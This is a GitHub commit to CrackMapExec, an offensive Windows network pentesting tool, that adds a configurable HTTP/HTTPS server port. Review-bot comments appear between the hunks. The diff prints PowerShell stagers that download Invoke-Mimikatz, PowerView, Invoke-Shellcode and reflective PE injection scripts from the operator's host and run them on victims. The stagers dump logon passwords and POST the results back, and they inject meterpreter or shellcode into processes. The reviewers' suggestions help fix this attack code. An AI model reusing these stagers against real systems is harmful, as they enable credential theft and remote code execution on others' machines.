This repository was archived by the owner on Dec 6, 2023. It is now read-only.

Commit f0fe1a2

author
byt3bl33d3r
committed
Added option to set the HTTP/HTTPS server port (resolves #33)
1 parent 0d1e580 commit f0fe1a2

3 files changed

+42
-25
lines changed


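--- a/core/powershell.py
+++ b/core/powershell.py
@@ -32,18 +32,19 @@ def __init__(self, server, localip):
 def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
 
 command = """
-IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
+IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1');
 $creds = Invoke-{func_name} -Command '{katz_command}';
-$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
+$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
 $request.Method = 'POST';
 $request.ContentType = 'application/x-www-form-urlencoded';
 $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
 $request.ContentLength = $bytes.Length;
 $requestStream = $request.GetRequestStream();
 $requestStream.Write( $bytes, 0, $bytes.Length );
 $requestStream.Close();
-$request.GetResponse();""".format(protocol=self.protocol,
-func_name=self.func_name,
+$request.GetResponse();""".format(protocol=self.protocol,
+port=settings.args.server_port,
+func_name=self.func_name,
 addr=self.localip,
 katz_command=command)
 
@@ -52,30 +53,32 @@ def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
 def powerview(self, command):
 
 command = """
-IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1');
+IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
 $output = {view_command} | Out-String;
-$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
+$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
 $request.Method = 'POST';
 $request.ContentType = 'application/x-www-form-urlencoded';
 $bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
 $request.ContentLength = $bytes.Length;
 $requestStream = $request.GetRequestStream();
 $requestStream.Write( $bytes, 0, $bytes.Length );
 $requestStream.Close();
-$request.GetResponse();""".format(protocol=self.protocol,
+$request.GetResponse();""".format(protocol=self.protocol,
+port=settings.args.port,
 addr=self.localip,
 view_command=command)
 
 return ps_command(command)
 
 def inject_meterpreter(self):
 command = """
-IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1');
-Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol,
+IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1');
+Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol,
+settings.args.server_port,
 self.localip,
 self.func_name,
-settings.args.inject[4:],
-settings.args.met_options[0],
+settings.args.inject[4:],
+settings.args.met_options[0],
 settings.args.met_options[1])
 if settings.args.procid:
 command += " -ProcessID {}".format(settings.args.procid)
@@ -86,10 +89,11 @@ def inject_meterpreter(self):
 
 def inject_shellcode(self):
 command = """
-IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
+IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
 $WebClient = New-Object System.Net.WebClient;
-[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
+[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
 Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
+port=settings.args.server_port,
 func_name=self.func_name,
 addr=self.localip,
 shellcode=settings.args.path.split('/')[-1])
@@ -103,11 +107,12 @@ def inject_shellcode(self):
 
 def inject_exe_dll(self):
 command = """
-IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
-Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol,
-func_name=self.func_name,
-addr=self.localip,
-pefile=settings.args.path.split('/')[-1])
+IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
+Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol,
+port=settings.args.server_port,
+func_name=self.func_name,
+addr=self.localip,
+pefile=settings.args.path.split('/')[-1])
 
 if settings.args.procid:
 command += " -ProcID {}"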
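Review bot: `port=settings.args.port` in powerview (new line 67) formats the stager with the SMB port from `--port` (139/445, default 445) instead of the new `--server-port` value, so the PowerView download and its POST-back would target `{addr}:445` while mimikatz, inject_meterpreter, inject_shellcode and inject_exe_dll all use `settings.args.server_port`; change it to `port=settings.args.server_port,`. Since the value is formatted into five separate templates, a small `self.server_url` (or a `_base_url()` helper returning `'{}://{}:{}'.format(self.protocol, self.localip, settings.args.server_port)`) would make this class of mismatch impossible, though that is beyond this commit. Separately, the pre-existing context line `command += " -ProcID {}"` in inject_exe_dll is never `.format`-ed with `settings.args.procid`, unlike the `-ProcessID` line in inject_meterpreter — the body of inject_exe_dll continues past the hunk, so the fix may already be there; worth checking while this file is open.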

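--- a/core/servers/mimikatz.py
+++ b/core/servers/mimikatz.py
@@ -89,14 +89,14 @@ def do_POST(self):
 for line in buf:
 print_att(line.strip())
 
-def http_server():
-http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
+def http_server(port):
+http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
 t = Thread(name='http_server', target=http_server.serve_forever)
 t.setDaemon(True)
 t.start()
 
-def https_server():
-https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
+def https_server(port):
+https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
 https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
 t = Thread(name='https_server', target=https_server.serve_forever)
 t.setDaemon(True)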
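Review bot: `http_server(port)` and `https_server(port)` now bind `('0.0.0.0', port)` with a caller-supplied value and no error handling, so a port that is already in use, a port below 1024 without the needed privileges, or an out-of-range value from `--server-port` escapes `BaseHTTPServer.HTTPServer(...)` as a raw `socket.error` / `OverflowError` traceback rather than a message naming the port. Suggest wrapping the constructor in both functions, e.g. `try: http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)` / `except socket.error as e: raise SystemExit('Unable to bind server on 0.0.0.0:{}: {}'.format(port, e))` (assuming `socket` is imported here — only `ssl` and `Thread` are visible in the hunk). Both functions gained a parameter without a docstring; a one-liner such as `"""Start the HTTP listener that receives POSTed tool output on 0.0.0.0:port in a daemon thread."""` would document the new contract, and that the listener is exposed on every interface is worth stating since the port is now user-chosen.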

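--- a/crackmapexec.py
+++ b/crackmapexec.py
@@ -72,7 +72,7 @@
 parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
 parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
 parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
-#parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
+parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
 
 #How much fail can we limit? can we fail at failing to limit? da da da dum
 parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
@@ -150,6 +150,18 @@
 patterns = []
 targets = []
 
+if args.server == 'http':
+if args.server_port:
+args.http_port = args.server_port
+else:
+args.server_port = 80
+
+if args.server == 'https':
+if args.server_port:
+args.https_port = args.server_port
+else:
+args.server_port = 443
+
 init_args(args)
 
 if args.verbose:
@@ -245,10 +257,10 @@ def get_targets(target):
 
 if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
 if args.server == 'http':
-http_server()
+http_server(args.server_port)
 
 elif args.server == 'https':
-https_server()
+https_server(args.server_port)
 
 def concurrency(targets):
 '''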
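Review bot: The new block at lines 153–163 assigns `args.http_port` / `args.https_port`, but nothing in this commit reads them — `core/powershell.py` and the `http_server(args.server_port)` / `https_server(args.server_port)` calls all use `args.server_port` — so those two attributes are dead and the block only implements defaulting. `--server-port` is declared `type=int` with no range check, so `--server-port 70000` passes argparse and fails later at bind time, and `0` is silently treated as "not set" by `if args.server_port:`. Suggest collapsing the two if-blocks to `if args.server_port is None:` / `    args.server_port = 80 if args.server == 'http' else 443`, and on the argument either `choices=range(1, 65536)` or an explicit `parser.error(...)` for values outside 1–65535, with help text `'Start the server on the specified port (default: 80 for http, 443 for https)'` so the defaults are visible in `--help`.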
